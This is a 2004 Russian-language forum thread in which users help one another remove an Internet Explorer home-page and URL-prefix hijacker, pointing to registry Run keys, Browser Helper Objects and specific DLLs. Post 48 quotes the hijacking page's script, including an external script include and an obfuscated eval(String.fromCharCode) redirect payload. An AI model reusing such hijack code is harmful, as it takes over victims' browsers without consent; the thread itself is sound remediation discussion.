Текущий архив: 2004.08.08;
Скачать: CL | DM;
Вниз
Вот же гадость! (portal.tetki.ru) Найти похожие ветки
← →
KosilkA © (2004-07-13 12:34) [0]у меня в настройках обозревателя периодически в домашнюю страницу ставится эта дрянь . И еще в настройках реестра в ключе IE "default preffix" оно заменяет "http://" на "http://sexy...бла_бла_бла_что-то_там_не помню..." . Никак не могу избавиться , думал что реестр почистил , ан нет , ОНО вылезло буквально через три дня , вот же сволочь. Антивирус тоже ничего не сказал ... Поиск по реестру и винту текста типа "portal" и "sexy" ничего не дал . В автозапуске вроде чисто ... Кто нибудь сталкивался с подобным , и как это лечить?
← →
Угу (2004-07-13 12:39) [1]Ладони побрей, говорят, помогает. Ослепнешь ведь. :((
← →
KosilkA © (2004-07-13 12:44) [2]
> Угу (13.07.04 12:39) [1]
по своему опыту сказал щас?
← →
TransparentGhost (2004-07-13 12:50) [3]Сталкивался, но хватило чистки регистров, правда другой сайт лез.
← →
ASMiD (2004-07-13 12:56) [4]А не пробовал найти поиском в каком файле сия гадость сидит?
← →
NailMan © (2004-07-13 12:58) [5]Видать к ослику IE ты шпиёна подцепил. Крути к нему плагины - оно там должно поселяться.
---
WBR, NailMan aka 2:5020/3337.13
← →
ПЛОВ © (2004-07-13 13:02) [6]Format C: + Reinstall Windows - поможет 99%
← →
KosilkA © (2004-07-13 13:06) [7]
> ASMiD (13.07.04 12:56) [4]
искал ,но думаю люди создавшие это тоже не дураки =)
>
> NailMan © (13.07.04 12:58) [5]
поищу какую нибудь софтинку
← →
ASMiD (2004-07-13 13:07) [8]Можно и с меньшими потерями.
Грузишся с CD, удаляешь папки Windows и Program Files от Documents and Settings оставляешь только содержимое своих документов, стираешь все файлы на C: и вперед Install
← →
KosilkA © (2004-07-13 13:08) [9]
> ПЛОВ © (13.07.04 13:02) [6]
ну да... после format c: без reinstall windows никак не обойтись =))
← →
Sergey Vorobyev (2004-07-13 13:09) [10]Если антивирусники не помогли, можно попробовать Ad-aware или другие Anti-spy-ки. Когда сам проверил столько "заразы" обнаружил!!!
← →
KosilkA © (2004-07-13 13:13) [11]
> Sergey Vorobyev (13.07.04 13:09) [10]
вот! ad-aware !спасиб! у меня на слуху вертелось это название , но я просто не мог его вспомнить +))))))
← →
ASMiD (2004-07-13 13:13) [12]
> искал ,но думаю люди создавшие это тоже не дураки =)
А какие винды? Под ХП ищется плохо - лучше под 98.
Ну а в старье Norton Utilites была вообще шикарная прога TS.exe
Уж если есть текст - то точно найдет или если хочется поизвращаться можно искать по секторам диска.
← →
ПЛОВ © (2004-07-13 13:14) [13]
> ну да... после format c: без reinstall windows никак не
> обойтись =))
почему же? как вариант - format c: /s (вроде так оно пишеться?)
← →
KosilkA © (2004-07-13 13:15) [14]
> ASMiD (13.07.04 13:13) [12]
w2k..
я тотал-коммандером всегда ищу , вроде проблем с поиском в экзешниках у него не наблюдалось никогда
← →
ASMiD (2004-07-13 13:18) [15]Я говорил про ХП
← →
DelphiNew (2004-07-13 13:26) [16]просканируй весь реестр по названию ссылки (точне по первым сиволам, например "http://sexy.com ), и просмотри файл shdoclc.dll - должно помочь
← →
Паниковский © (2004-07-13 13:32) [17]KosilkA
а антевирус как тебе должен был помочь в этом благородном деле?
← →
Anatoly Podgoretsky © (2004-07-13 13:32) [18]Не лазь по помойкам
← →
Паниковский © (2004-07-13 13:35) [19]почитай в факах а как другу зделать подлянку ну чтобы ему запуздыривался все время адрес как домашний.
все равно горе вирусо писаки эти дальше фака не ушли у них с воображением плохо
Anatoly Podgoretsky
Помог бы лучше что ли.
← →
ПЛОВ © (2004-07-13 13:36) [20]
> Не лазь по помойкам
Вот это точно... А потом ище кричат, ой, я вирус подхватил!!! Сыр он жеж известно где только бесплатный...
← →
Anatoly Podgoretsky © (2004-07-13 13:41) [21]Паниковский © (13.07.04 13:35) [19]
Адреса подкинуть? Пусть начнет с http://www.xxx.com
← →
KosilkA © (2004-07-13 14:03) [22]
> Anatoly Podgoretsky © (13.07.04 13:41) [21]
в сети встречаются сайты авторы которых распространяют т.н. партнерские программы через iframe , или через уязвимость ms-its:, и прочую дрянь, совсем не обязательно это могут быть порносайты. А про помойку я скажу - есть такое мнение что весь интернет - большая помойка , потому что когда что то ищешь , приходится перелопачивать горы мусора и флуда . Или например,получать на свой вопрос безотносительные и в принципе ни на что не отвечающие ответы... ;-)
← →
ISP © (2004-07-13 14:06) [23]Посмотри в C:\WINDOWS\Downloaded Program Files. Они там любят поселятся.
← →
KosilkA © (2004-07-13 14:07) [24]
> Паниковский © (13.07.04 13:35) [19]
почитай в факах а как другу зделать подлянку ну чтобы ему запуздыривался все время адрес как домашний.
все равно горе вирусо писаки эти дальше фака не ушли у них с воображением плохо
я почитал не факи а реестр , и узнал про подлянку с "URL/prefixes" =))
правда после удаления оно вернулось.. гы
← →
Anatoly Podgoretsky © (2004-07-13 14:08) [25]KosilkA © (13.07.04 14:03) [22]
Да Интернет большая помойка и ходить надо по провереным местам, по непровереным надо ходить прнимая меры защиты.
← →
Паниковский © (2004-07-13 14:08) [26]Anatoly Podgoretsky
понятно
вообщем: хелп нот фаунд вкл флуд
← →
inic © (2004-07-13 14:09) [27]KosilkA (13.07.04 12:34)
Была такая бодяга и у меня (какой-то "нехороший" тулбар в IE - ну люблю я женщин, люблю :), тоже страница домашняя всегда менялась.
так вот штука эта засела в "WINDOWS\downloaded Program Files", заодно посмотри eXeSCOPом какие либы использует, потому что иногда в WINDOWS\SYSTEM32 что-то вместе с собой копирует (хотя не помню).
← →
Паниковский © (2004-07-13 14:11) [28]KosilkA
ну попробуй посмотри еще и загрузку
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ну и загрузку самого Эксплорера
где находится ХЗ
← →
sniknik © (2004-07-13 14:12) [29]> Или например,получать на свой вопрос безотносительные и в принципе ни на что не отвечающие ответы... ;-)
так чего же ты хотел? и еше практикуются точные ответы которыми спрашиваюшие точно не воспользуются.
вот скачай, установи и пользуйся. к нему дрянь не цепляется. не ч чему.
ftp.mozilla.org/pub/mozilla.org/firefox/releases/0.9.1/FirefoxSetup-0.9.1.exe
← →
Паниковский © (2004-07-13 14:12) [30]Anatoly Podgoretsky
а какие методы защиты могут быть?
← →
KosilkA © (2004-07-13 14:13) [31]
> ISP © (13.07.04 14:06) [23]
> Посмотри в C:\WINDOWS\Downloaded Program Files. Они там
> любят поселятся.
нашел файл voxmsdec.inf
выдержка из него:[SourceDisksNames]
1 = "Voxware MetaSound Codec Install",,0
что за зверь , судя по всему какой то кодек , но чтоб я его ставил - не помню , да и не слышал про такой ....
Еще там лежит пустая папка с именем CONFLICT.1
вот собсна и всё
← →
Паниковский © (2004-07-13 14:15) [32]KosilkA
это кодек на просмотр видео
по идее поищи лучше DLL
← →
Anatoly Podgoretsky © (2004-07-13 14:31) [33]Паниковский © (13.07.04 14:08) [26]
Количество мест куда может прицепить автозагрузка свыше 60, без иследования его системы сказать где невозможно, зато можно сказать, что это последствия антиманитарии.
Более того любые лечилки и искалки срабатываю позже и то не всегда, для малоизвестных и адресных лечения, кроме конечно изучения или переформатирования не будет. Хорошо помогает провереный имидж системы, это одна из санитарных мер, не профилактических, а борьба с последствиями.
← →
Slider007 © (2004-07-15 07:22) [34]Вообще ходить по таким сайтам я считаю дорого,не информативно и не безопасно. По моему лучче диск купить в ларьке (700мб этого добра всего за 80-100р), АВПой его прогнать и наслаждаться ... и никакая гадость не пролезет.
← →
Паниковский © (2004-07-15 07:28) [35]Slider007
АВП ищет вирусы которые есть в базе АВП
1 не факт что это вирус
2 не факт что этот врус есть в базе АВП
Anatoly Podgoretsky
Где в реестре ключи на загрузку IE?
← →
Леприкон © (2004-07-15 07:38) [36]
> KosilkA © (13.07.04 12:34)
Ищи qwe8264.dll в System32 и System. Если найдёшь, то ищи её в реестре. Будешь приятно удивлён, когда найдешь на неё ссылку в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects.
← →
Slider007 © (2004-07-15 07:40) [37]Паниковский
Я имел ввиду что у Косилки в настройках ИЕ поивилась эта дрянь после посещения сайтов определённого содержания. Так вот если их не посещать, а воспользоваться компакт диском из ларька то такой проблемы не будет. К тому же обойдется это на порядок дешевле (если инет конечно не халявный). А воспользоваться интивирусом (не обязательно АВП - уж простите что пользуюсь этой гадостью) желательно чтоб не нахватать не конкретно ЭТОЙ дряни, а какой-нибудь другой, возможно менее безобидной.
← →
Леприкон © (2004-07-15 07:45) [38]ИМХО, дрянь пока мало изученная. У нас была целая эпидемия. Случайно наткнулся. Вобщем вся эта дрянь из Browser Helper Objects. :))
← →
Паниковский © (2004-07-15 08:12) [39]Slider007
я просто имел ввиду что не все вредоносные проги идентифицируются как вирусня
и тем более АВП не является средством на все случаи жизни
← →
Slider007 © (2004-07-15 08:32) [40]Паниковский
Понятно :):)
← →
Anatoly Podgoretsky © (2004-07-15 09:41) [41]Паниковский © (15.07.04 08:12) [39]
Так это и не вирус, а добропорядочная программа - помощник Интернет Эксплорера и ее нельзя идентифицировать как вирус, поскольку ставится по желанию пользователя.
Кое кто попробовал класифицировать помощников от Яху и Гагла так, так он остался без штанов.
← →
Паниковский © (2004-07-15 10:16) [42]Anatoly Podgoretsky
а спам это такая реклама ((
← →
Sergey Kaminski (2004-07-15 10:21) [43]2 Паниковский © (15.07.04 10:16) [42]
Нет, реклама это такой спам, который придумали еще до спама. А потом придумали спам и всем стало еще лучше.
← →
Мазут Береговой © (2004-07-15 11:02) [44]Как дети, ей-богу...
http://www.softpedia.com/public/cat/10/17/10-17-150.shtml
или вот
http://www.mvps.org/sramesh2k/Defend_CWS.htm
Дерзайте... :-)
← →
KosilkA © (2004-07-15 11:10) [45]
> Леприкон © (15.07.04 07:38) [36]
>
> Ищи qwe8264.dll в System32 и System. Если найдёшь, то ищи
> её в реестре. Будешь приятно удивлён, когда найдешь на неё
> ссылку в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser
> Helper Objects.
Спасибо огромное! Нашёл эту дрянь и еше qwe0486.dll до кучи . Файлы явно не от майкрософта судя по закладке "версия" =)))
← →
Леприкон © (2004-07-15 11:14) [46]
> KosilkA © (15.07.04 11:10) [45]
> qwe0486.dll
Бурная фантазия у этих писак. Имена звучные дают. :))) гы
← →
Паниковский © (2004-07-15 11:20) [47]Леприкон
нету у них ума и фантазии
эти вещи пишут уроды которые спрашивают "как зделать так чтоб прогу не было ваще видно?"
← →
Мазут Береговой © (2004-07-15 11:22) [48]Кому интересно:
1.
<script language="javascript">
<!--
document.cookie="fetdata=230363e24303e24373e213434356e6d25737d4f6a796c6c616f243e203028236f6d60716479626c656b302d43594540 263e203b3027596e646f6773702e4450253e213b302e2e454450234c4250213e203e23373035392; Expires=Friday, 16-Jul-2004 7:18:31 GMT; path=/;"
//-->
</script>
2.
onBeforeUnload="stats()";
3.
<script language="JavaScript" src="http://www.lola-plus.com/xox.js">
А там:
<!--
eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,103,111,40,117,114,108,41,123,105,102,40,112,97,114,101,1 10,116,46,119,105,110,100,111,119,46,111,112,101,110,101,114,41,112,97,114,101,110,116,46,119,105,110,100,111,119,46,111 ,112,101,110,101,114,46,108,111,99,97,116,105,111,110,61,117,114,108,125,59,32,102,103,111,32,40,34,32,104,116,116,112,5 8,47,47,119,119,119,46,120,120,120,115,111,102,116,46,99,111,109,47,102,114,101,101,45,116,111,117,114,47,34,41,59));
// -->
← →
Мазут Береговой © (2004-07-15 11:26) [49]Мне интересно было как они это делают, вот и сидел шарился... Правда не уверен, что это то, но очень похоже...
← →
Мазут Береговой © (2004-07-15 11:31) [50]Да, забыл. Все это срабатывает, когда закрываешь страницу. Начинает грузить Dll для IE, а потом запускает...
← →
AID (2004-07-15 12:26) [51]А у меня что-то подопное. После подключения (Dial-Up) и запуска IE меняются настройки этого подключения. А точнее:
Логин:ConnInts0
Пароль:(выдёргивать не охото, но меняется точно)...
Телефон:8,1068261484
← →
Евген (2004-07-22 11:07) [52]Не обязательно лазить по порносайтам, чтобы это получить.
Я по почте неосторожно получил.
РЕцепт чистки здесь:
http://www.natm.ru/forum/viewthread.php?s=&threadid=7075
Страницы: 1 2 вся ветка
Текущий архив: 2004.08.08;
Скачать: CL | DM;
Память: 0.57 MB
Время: 0.039 c
